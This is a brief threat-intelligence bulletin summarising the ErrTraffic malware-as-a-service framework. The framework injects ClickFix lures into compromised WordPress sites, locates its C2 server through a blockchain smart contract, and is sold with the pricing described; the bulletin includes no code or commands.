ErrTraffic Framework Injects ClickFix Lures into Compromised WordPress Sites

EXECUTIVE SUMMARY:

A North Korean threat group has been targeting financial institutions. The attackers use a malicious JavaScript framework called ErrTraffic, which is injected into compromised WordPress sites to display the ClickFix lure and subsequently deliver malware to visitors. This framework is sold as a Malware-as-a-Service accompanied by a malicious WordPress plugin that facilitates deployment and an administration panel for managing payloads, statistics, geolocation-based filtering, and other features. ErrTraffic's operator also sells the source code "as-is." The injected script on compromised WordPress sites queries a smart contract on a blockchain to retrieve the ErrTraffic C2 server.[emaillocker id="1283"]

This mechanism allows the attackers to rotate infrastructure without redeploying code across thousands of compromised sites and helps prevent blocking by security solutions through regular updates. Since its first version, ErrTraffic went through several iterations. ErrTraffic v3 uses the EtherHiding technique as Dead Drop Resolver. The threat actor operating under the handle LenAI has advertised and sold the ErrTraffic framework under a MaaS model on the cybercrime forum and Telegram.

LenAI's pricing model evolved during the first half of, with monthly subscription fees rising from $300 to $380, and the price of the source code doubling from $1,500 in January to $3,000 in April. The subscription model includes a limited number of rental spots, restricting access to a selected group of clients, and operating on a queue-based system. This shift underscores a lucrative and efficient cybercrime business model, as well as its successful establishment within the traffic distribution ecosystem.

THREAT PROFILE:

REFERENCES:

The following reports contain further technical details:
https://www.sekoia.com/blog/unveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework